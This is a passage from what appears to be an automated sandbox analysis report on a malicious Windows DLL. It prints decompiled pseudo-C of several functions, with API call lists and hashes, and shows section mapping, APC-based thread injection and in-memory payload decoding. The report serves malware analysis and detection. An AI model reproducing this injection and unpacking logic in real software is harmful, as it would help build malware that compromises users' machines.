				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x10001a56
0x10001a5c
0x10001a6a
0x10001a71
0x10001a76
0x10001a7c
0x00000000
0x10001a7d
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,10001A08,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,10001A08,?), ref: 10001A71

Memory Dump Source

Source File: 00000000.00000002.940299869.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.940284831.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.940319949.0000000010003000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.940333046.0000000010005000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.940346053.0000000010006000.00000002.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 19d529d38f2a3e11611b8b1d221fd0049a8602d5a3d49d13015f579f0f6b8145
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: A7F012B5A0420CBFEB119FA5CC85C9FBBBDEB44294B104939F552E1094D6309E089A61

Uniqueness

Uniqueness Score: -1.00%

Function 10001ADA, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E10001ADA(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L10002130();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x10004144;
				_push(_t15 + 0x1000505e);
				_push(_t15 + 0x10005054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L1000212A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x10004148, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x10001ada
0x10001ae3
0x10001ae7
0x10001aed
0x10001af2
0x10001af7
0x10001afa
0x10001afd
0x10001b02
0x10001b03
0x10001b06
0x10001b11
0x10001b18
0x10001b1c
0x10001b1e
0x10001b1f
0x10001b22
0x10001b27
0x10001b31
0x10001b33
0x10001b33
0x10001b47
0x10001b4d
0x10001b51
0x10001ba1
0x10001b53
0x10001b5c
0x10001b72
0x10001b7a
0x10001b8c
0x10001b90
0x00000000
0x00000000
0x10001b7c
0x10001b7f
0x10001b84
0x10001b86
0x10001b86
0x10001b67
0x10001b69
0x10001b92
0x10001b93
0x10001b93
0x10001b5c
0x10001ba9

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 10001AE7
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 10001AFD
_snwprintf.NTDLL ref: 10001B22
CreateFileMappingW.KERNELBASE(000000FF,10004148,00000004,00000000,?,?), ref: 10001B47
GetLastError.KERNEL32 ref: 10001B5E
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 10001B72
GetLastError.KERNEL32 ref: 10001B8A
CloseHandle.KERNEL32(00000000), ref: 10001B93
GetLastError.KERNEL32 ref: 10001B9B

Memory Dump Source

Source File: 00000000.00000002.940299869.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.940284831.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.940319949.0000000010003000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.940333046.0000000010005000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.940346053.0000000010006000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: 2e8302c24db467e9b5466d5654d080b83219e3fbe8e67ba6f678f57f6a515046
Instruction ID: bcc887d71675999c673e285f1704182bf9803c61a9668b0f160e92206cf9e2cc
Opcode Fuzzy Hash: 2e8302c24db467e9b5466d5654d080b83219e3fbe8e67ba6f678f57f6a515046
Instruction Fuzzy Hash: 50216DB6900118BFF711EFA4CC84EDE77ADEB543D0F118066FA05D7154EB3099468B61

Uniqueness

Uniqueness Score: -1.00%

Function 10001146, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001146(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E10002009(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x10004144 + 0x10005014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x10004144 + 0x10005151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E1000201E(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x10004144 + 0x10005161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x10004144 + 0x10005174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x10004144 + 0x10005189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x10004144 + 0x1000519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E10001996(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x10001154
0x10001158
0x10001219
0x1000115e
0x10001176
0x10001185
0x1000118c
0x1000118e
0x10001193
0x10001211
0x10001212
0x10001195
0x100011a2
0x100011a4
0x100011a9
0x00000000
0x100011ab
0x100011b8
0x100011ba
0x100011bf
0x00000000
0x100011c1
0x100011ce
0x100011d0
0x100011d5
0x00000000
0x100011d7
0x100011e4
0x100011e6
0x100011eb
0x00000000
0x100011ed
0x100011f3
0x100011f9
0x100011fe
0x10001203
0x10001208
0x00000000
0x1000120a
0x1000120d
0x1000120d
0x10001208
0x100011eb
0x100011d5
0x100011bf
0x100011a9
0x10001193
0x10001227

APIs

Part of subcall function 10002009: HeapAlloc.KERNEL32(00000000,?,10001FA5,00000208,00000000,00000000,?,?,?,100014C0,?), ref: 10002015

GetModuleHandleA.KERNEL32(?,00000020), ref: 1000116A
GetProcAddress.KERNEL32(00000000,?), ref: 1000118C
GetProcAddress.KERNEL32(00000000,?), ref: 100011A2
GetProcAddress.KERNEL32(00000000,?), ref: 100011B8
GetProcAddress.KERNEL32(00000000,?), ref: 100011CE
GetProcAddress.KERNEL32(00000000,?), ref: 100011E4

Part of subcall function 10001996: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000), ref: 100019F3
Part of subcall function 10001996: memset.NTDLL ref: 10001A15

Memory Dump Source

Source File: 00000000.00000002.940299869.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.940284831.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.940319949.0000000010003000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.940333046.0000000010005000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.940346053.0000000010006000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: 17d813e253e26c7d917519e6547015275f2db354573dbeff9a142f8077207000
Instruction ID: cc8e7b0cdea4028d8609f0a74ea6faac012f454d02bbe199c50159465f61c836
Opcode Fuzzy Hash: 17d813e253e26c7d917519e6547015275f2db354573dbeff9a142f8077207000
Instruction Fuzzy Hash: EA2107B160071AAFEB11DFB9CD80E9BB7ECEF643C17024466E945D7219EB70E9108B60

Uniqueness

Uniqueness Score: -1.00%

Function 10001D4B, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x10004108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x1000410c;
						if( *0x1000410c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x10004118;
								if( *0x10004118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x1000410c);
						}
						HeapDestroy( *0x10004110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x10004108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						 *0x10004110 = _t18;
						_t41 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x10004130 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E1000155C(E100015EA, E10001A86(_a12, 1, 0x10004118, _t41));
							 *0x1000410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x10001d4e
0x10001d5a
0x10001d5c
0x10001d5f
0x10001dd5
0x10001ddb
0x10001ddd
0x10001ddf
0x10001de5
0x10001de7
0x10001dec
0x10001def
0x10001dfa
0x10001dfc
0x00000000
0x00000000
0x10001dfe
0x10001e01
0x10001e03
0x00000000
0x00000000
0x00000000
0x10001e03
0x10001e0b
0x10001e0b
0x10001e17
0x10001e17
0x10001d61
0x10001d62
0x10001d82
0x10001d88
0x10001d8d
0x10001d8f
0x10001dcb
0x10001dcb
0x10001d91
0x10001d99
0x10001da0
0x10001daa
0x10001db6
0x10001dbb
0x10001dc2
0x10001dc7
0x00000000
0x10001dc7
0x10001dc2
0x10001d8f
0x10001d62
0x10001e24

APIs

InterlockedIncrement.KERNEL32(10004108), ref: 10001D6D
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 10001D82

Part of subcall function 1000155C: CreateThread.KERNEL32(00000000,00000000,00000000,?,10004118,10001DBB), ref: 10001573
Part of subcall function 1000155C: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 10001588
Part of subcall function 1000155C: GetLastError.KERNEL32(00000000), ref: 10001593
Part of subcall function 1000155C: TerminateThread.KERNEL32(00000000,00000000), ref: 1000159D
Part of subcall function 1000155C: CloseHandle.KERNEL32(00000000), ref: 100015A4
Part of subcall function 1000155C: SetLastError.KERNEL32(00000000), ref: 100015AD

InterlockedDecrement.KERNEL32(10004108), ref: 10001DD5
SleepEx.KERNEL32(00000064,00000001), ref: 10001DEF
CloseHandle.KERNEL32 ref: 10001E0B
HeapDestroy.KERNEL32 ref: 10001E17

Memory Dump Source

Source File: 00000000.00000002.940299869.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.940284831.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.940319949.0000000010003000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.940333046.0000000010005000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.940346053.0000000010006000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: 40578092a05b622e8806beb96ef45d375467769f53722385fffed7eee2b4cb66
Instruction ID: 8abdcd5857cf8f821d83f0baa7898db106f37a39b4e53263aae9e46ce88ae204
Opcode Fuzzy Hash: 40578092a05b622e8806beb96ef45d375467769f53722385fffed7eee2b4cb66
Instruction Fuzzy Hash: 63215EB1601265AFF701EFA9CCC89CE7BE8FB552E17128529FA05D3168DB748D808F94

Uniqueness

Uniqueness Score: -1.00%

Function 1000155C, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000155C(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x10004140, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x10001573
0x10001579
0x1000157d
0x10001588
0x10001590
0x10001599
0x1000159d
0x100015a4
0x100015ab
0x100015ad
0x100015b3
0x10001590
0x100015b7

APIs

CreateThread.KERNEL32(00000000,00000000,00000000,?,10004118,10001DBB), ref: 10001573
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 10001588
GetLastError.KERNEL32(00000000), ref: 10001593
TerminateThread.KERNEL32(00000000,00000000), ref: 1000159D
CloseHandle.KERNEL32(00000000), ref: 100015A4
SetLastError.KERNEL32(00000000), ref: 100015AD

Memory Dump Source

Source File: 00000000.00000002.940299869.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.940284831.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.940319949.0000000010003000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.940333046.0000000010005000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.940346053.0000000010006000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 6f0211ee254cd8ac356c66c047a1bb7dd8caa7d1716406ebd0edc35e6fc89079
Instruction ID: be479b49fbd3a67d9e649fe4ff68f805dcd113b126df67a65f96eea9d80bca7e
Opcode Fuzzy Hash: 6f0211ee254cd8ac356c66c047a1bb7dd8caa7d1716406ebd0edc35e6fc89079
Instruction Fuzzy Hash: 6CF0FE72506631FBF3235BA19C98F9BBB6DFB487D1F018404FA0695168C72189119BA5

Uniqueness

Uniqueness Score: -1.00%

Function 10001717, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 111
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E10001717(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				unsigned int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				void* _v36;
				signed int _v40;
				signed char _v44;
				void* _v48;
				signed int _v56;
				signed int _v60;
				intOrPtr _t50;
				void* _t57;
				void* _t61;
				signed int _t67;
				signed char _t69;
				signed char _t70;
				void* _t76;
				intOrPtr _t77;
				unsigned int _t82;
				intOrPtr _t86;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				signed int _t93;

				_t90 =  *0x10004130;
				_t50 = E1000193C(_t90,  &_v28,  &_v20);
				_v24 = _t50;
				if(_t50 == 0) {
					asm("sbb ebx, ebx");
					_t67 =  ~( ~(_v20 & 0x00000fff)) + (_v20 >> 0xc);
					_t91 = _t90 + _v28;
					_v48 = _t91;
					_t57 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
					_t76 = _t57;
					_v36 = _t76;
					if(_t76 == 0) {
						_v24 = 8;
					} else {
						_t69 = 0;
						if(_t67 <= 0) {
							_t77 =  *0x10004140;
						} else {
							_t86 = _a4;
							_v8 = _t91;
							_v8 = _v8 - _t76;
							_t14 = _t86 + 0x100051a7; // 0x3220a9c2
							_t61 = _t57 - _t91 + _t14;
							_v16 = _t76;
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t70 = _t69 + 1;
								_v44 = _t70;
								_t82 = (_v60 ^ _v56) + _v28 + _a4 >> _t70;
								if(_t82 != 0) {
									_v32 = _v32 & 0x00000000;
									_t89 = _v16;
									_v12 = 0x400;
									do {
										_t93 =  *((intOrPtr*)(_v8 + _t89));
										_v40 = _t93;
										if(_t93 == 0) {
											_v12 = 1;
										} else {
											 *_t89 = _t93 + _v32 - _t82;
											_v32 = _v40;
											_t89 = _t89 + 4;
										}
										_t33 =  &_v12;
										 *_t33 = _v12 - 1;
									} while ( *_t33 != 0);
								}
								_t69 = _v44;
								_t77 =  *((intOrPtr*)(_t61 + 0xc)) -  *((intOrPtr*)(_t61 + 8)) +  *((intOrPtr*)(_t61 + 4));
								_v16 = _v16 + 0x1000;
								 *0x10004140 = _t77;
							} while (_t69 < _t67);
						}
						if(_t77 != 0x63699bc3) {
							_v24 = 0xc;
						} else {
							memcpy(_v48, _v36, _v20);
						}
						VirtualFree(_v36, 0, 0x8000); // executed
					}
				}
				return _v24;
			}

0x1000171e
0x1000172e
0x10001733
0x10001738
0x1000174d
0x10001754
0x10001759
0x1000176a
0x1000176d
0x10001773
0x10001775
0x1000177a
0x10001856
0x10001780
0x10001780
0x10001784
0x1000181c
0x1000178a
0x1000178b
0x10001790
0x10001793
0x10001796
0x10001796
0x1000179d
0x100017a0
0x100017a8
0x100017a9
0x100017aa
0x100017b1
0x100017b5
0x100017bb
0x100017bf
0x100017c1
0x100017c5
0x100017c8
0x100017cf
0x100017d2
0x100017d5
0x100017da
0x100017f0
0x100017dc
0x100017e6
0x100017e8
0x100017eb
0x100017eb
0x100017f7
0x100017f7
0x100017f7
0x100017cf
0x10001802
0x10001805
0x10001808
0x1000180f
0x10001815
0x10001819
0x10001828
0x1000183d
0x1000182a
0x10001833
0x10001838
0x1000184e
0x1000184e
0x1000185d
0x10001863

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 1000176D
memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 10001833
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000), ref: 1000184E

Strings

Jun 9 2021, xrefs: 100017A0

Memory Dump Source

Source File: 00000000.00000002.940299869.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.940284831.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.940319949.0000000010003000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.940333046.0000000010005000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.940346053.0000000010006000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Jun 9 2021
API String ID: 4010158826-3443083063
Opcode ID: d6042d630db185a82e5861430691fbc1b34c09e24367e0ba5c4772c9cdc59302
Instruction ID: 8656aceba1012af9c0f70d32315d13d0163f230196990492a5e13c96c74a3fde
Opcode Fuzzy Hash: d6042d630db185a82e5861430691fbc1b34c09e24367e0ba5c4772c9cdc59302
Instruction Fuzzy Hash: 45415E75D0121A9FEB05CF98C880BDEBBB6FF48390F258129E90477248CB75AA45CB94

Uniqueness

Uniqueness Score: -1.00%

Function 100015EA, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E100015EA(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E10001456(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x100015f3
0x100015f8
0x10001606
0x1000160b
0x1000160b
0x10001611
0x10001616
0x1000161a
0x1000161e
0x1000161e
0x10001628
0x10001631

APIs

GetCurrentThread.KERNEL32 ref: 100015ED
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 100015F8
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 1000160B
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 1000161E

Memory Dump Source

Source File: 00000000.00000002.940299869.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.940284831.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.940319949.0000000010003000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.940333046.0000000010005000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.940346053.0000000010006000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: a5dee3e18e06bf60a8ab408e9f78a11656e4bb42588931547f78162ab20c471f
Instruction ID: b2e2ff5a5641eaa5a328bf891337565213f3a8f6a6c1ebe89abd2415300766a4
Opcode Fuzzy Hash: a5dee3e18e06bf60a8ab408e9f78a11656e4bb42588931547f78162ab20c471f
Instruction Fuzzy Hash: 52E092312076616BF302AB294C84EAF679CDF853F17028326F920D22E4DF658C0189B8

Uniqueness

Uniqueness Score: -1.00%

Function 10001020, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E10001020(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x10004140;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x63699bbf;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x63699bc1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x63699ba3;
					} else {
						_t54 = _t57 - 0x63699b83;
					}
					goto L9;
				}
				goto L12;
			}

0x1000102a
0x10001037
0x1000103d
0x10001049
0x10001059
0x1000105b
0x10001063
0x100010f8
0x100010ff
0x00000000
0x00000000
0x00000000
0x10001069
0x10001069
0x10001069
0x1000106d
0x00000000
0x00000000
0x10001079
0x1000107d
0x100010a1
0x100010a5
0x100010b9
0x100010b9
0x100010bf
0x100010ce
0x100010d2
0x100010da
0x100010da
0x100010e2
0x100010e5
0x100010f2
0x00000000
0x00000000
0x00000000
0x00000000
0x100010f2
0x100010ad
0x100010b1
0x100010b7
0x00000000
0x00000000
0x00000000
0x100010b7
0x10001085
0x10001089
0x10001093
0x1000108b
0x1000108b
0x1000108b
0x00000000
0x10001089
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 10001059
VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 100010CE
GetLastError.KERNEL32 ref: 100010D4

Memory Dump Source

Source File: 00000000.00000002.940299869.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.940284831.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.940319949.0000000010003000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.940333046.0000000010005000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.940346053.0000000010006000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 4c1abea7d63bd184b642161f34ec9ab0476bfd5839e23a7afc9709ae091432d0
Instruction ID: 55d5e6ed89b845a5fd71f3802b2c0cbe7de798cc965a0c14a267950e676fa16c
Opcode Fuzzy Hash: 4c1abea7d63bd184b642161f34ec9ab0476bfd5839e23a7afc9709ae091432d0
Instruction Fuzzy Hash: D5217F31800247DFDB14CFA5C885AEAF7F5FF08399F00896AD14297499E3B8A699CB51

Uniqueness

Uniqueness Score: -1.00%

Function 10001E55, Relevance: 3.1, APIs: 2, Instructions: 59
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001E55() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x10004144;
				if( *0x1000412c > 5) {
					_t16 = _t15 + 0x100050f9;
				} else {
					_t16 = _t15 + 0x100050b1;
				}
				E100016F1(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				if(E1000132A( &_v32,  &_v16,  *0x10004140 ^ 0xfd7cd1cf) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x10004138);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E10001ADA(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x10004138 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E10002033(_t44, _t32 + 4);
						}
					}
					_t25 = E10001634(_v28); // executed
				}
				ExitThread(_t25);
			}

0x10001e5b
0x10001e6c
0x10001e76
0x10001e6e
0x10001e6e
0x10001e6e
0x10001e7d
0x10001e86
0x10001e8b
0x10001ea9
0x10001f05
0x10001eab
0x10001eb1
0x10001eb7
0x10001ec5
0x10001ec9
0x10001ed0
0x10001ed9
0x10001edd
0x10001ee3
0x10001ef4
0x10001ee5
0x10001eeb
0x10001eeb
0x10001ee3
0x10001efc
0x10001efc
0x10001f07

APIs

lstrlenW.KERNEL32(?), ref: 10001EB1
ExitThread.KERNEL32 ref: 10001F07

Memory Dump Source

Source File: 00000000.00000002.940299869.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.940284831.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.940319949.0000000010003000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.940333046.0000000010005000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.940346053.0000000010006000.00000002.00020000.sdmp Download File

Similarity

API ID: ExitThreadlstrlen
String ID:
API String ID: 2636182767-0
Opcode ID: 116678ed17733bd9ed3f22f480b5e3fd2a9bdbacc699d8402b25238a8187df7b
Instruction ID: ab8ed00748b6518aaca1cd8150c39477dba6cc77ca46683760519d6ad69b4fbf
Opcode Fuzzy Hash: 116678ed17733bd9ed3f22f480b5e3fd2a9bdbacc699d8402b25238a8187df7b
Instruction Fuzzy Hash: C4115B725082469BF711DB64CC89ECB77ECEB583C0F02082AF951D71A9EB30E6458B96

Uniqueness

Uniqueness Score: -1.00%

Function 100016F1, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E100016F1(void* __eax, intOrPtr _a4) {

				 *0x10004150 =  *0x10004150 & 0x00000000;
				_push(0);
				_push(0x1000414c);
				_push(1);
				_push(_a4);
				 *0x10004148 = 0xc; // executed
				L10001A3E(); // executed
				return __eax;
			}

0x100016f1
0x100016f8
0x100016fa
0x100016ff
0x10001701
0x10001705
0x1000170f
0x10001714

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(10001E82,00000001,1000414C,00000000), ref: 1000170F

Memory Dump Source

Source File: 00000000.00000002.940299869.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.940284831.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.940319949.0000000010003000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.940333046.0000000010005000.00000004.00020000.sdmp Download File
